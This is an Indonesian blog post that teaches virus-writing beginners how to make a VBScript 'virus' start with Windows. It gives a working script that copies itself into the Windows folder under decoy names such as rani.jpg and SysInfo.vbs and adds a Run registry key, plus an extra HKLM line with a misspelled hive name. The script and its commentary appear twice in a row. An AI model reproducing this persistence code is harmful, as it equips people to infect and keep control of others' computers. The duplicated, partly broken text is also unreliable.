Hal ini sudah menjadi kebiasaan virus jadi mungkin sobat blogger juga sudah pada tahu caranya, ya benar dengan menuliskan informasi di registry pada key Run baik itu HKCU maupun HKLM. Apa itu HKCU dan HKLM ? lain waktu saja saya membahasnya, soalnya sata mau cari info dulu tentang HKCU dan HKLM, saya kan pemula alias newbie jadi gak tahu apa - apa ....... :(
: maluuuuuu.......
contoh script vbs-nya
=========================================================================
on error resume next
set dendrif=CreateObject("Scripting.FileSystemObject")
set vs=dendrif.OpenTextFile(Wscript.ScriptFullName)
set deo=createobject("Wscript.Shell")
c1vs=vs.ReadAll
vs.close
set win=dendrif.GetSpecialFolder(0)
set c2vs=dendrif.GetFile(Wscript.ScriptFullName)
c2vs.Copy (win & "\runs.vbs")
c2vs.Copy (win & "\rani.jpg")
c2vs.Copy (win & "\SysInfo.vbs")
deo.regwrite "HKEY_CURRENT_USER\Software\microsoft\windows\CurrentVersion\Run\SysInfo", win & "\runs.vbs","REG_SZ"
========================================================================
tidak ada yang perlu di jelaskan karena sudah dijelaskan dari sebelum - sebelumnya, intinya hanya menulis di registry saat windows aktif maka virus yang ada di C:\windows\runs.vbs ikut di jalankan... :)
coba tambahkan lagi di bawahnya:
deo.regwrite "HKEY_LOCALE_MACHINE\Software\microsoft\windows\CurrentVersion\Run\SysInfo", win & "\runs.vbs","REG_SZ"
screenshotnya:
semoga bermanfaat.......... :D
: maluuuuuu.......
contoh script vbs-nya
=========================================================================
on error resume next
set dendrif=CreateObject("Scripting.FileSystemObject")
set vs=dendrif.OpenTextFile(Wscript.ScriptFullName)
set deo=createobject("Wscript.Shell")
c1vs=vs.ReadAll
vs.close
set win=dendrif.GetSpecialFolder(0)
set c2vs=dendrif.GetFile(Wscript.ScriptFullName)
c2vs.Copy (win & "\runs.vbs")
c2vs.Copy (win & "\rani.jpg")
c2vs.Copy (win & "\SysInfo.vbs")
deo.regwrite "HKEY_CURRENT_USER\Software\microsoft\windows\CurrentVersion\Run\SysInfo", win & "\runs.vbs","REG_SZ"
========================================================================
tidak ada yang perlu di jelaskan karena sudah dijelaskan dari sebelum - sebelumnya, intinya hanya menulis di registry saat windows aktif maka virus yang ada di C:\windows\runs.vbs ikut di jalankan... :)
coba tambahkan lagi di bawahnya:
deo.regwrite "HKEY_LOCALE_MACHINE\Software\microsoft\windows\CurrentVersion\Run\SysInfo", win & "\runs.vbs","REG_SZ"
screenshotnya:
 |
| informasi startup virus di key Run |
semoga bermanfaat.......... :D
Tidak ada komentar:
Posting Komentar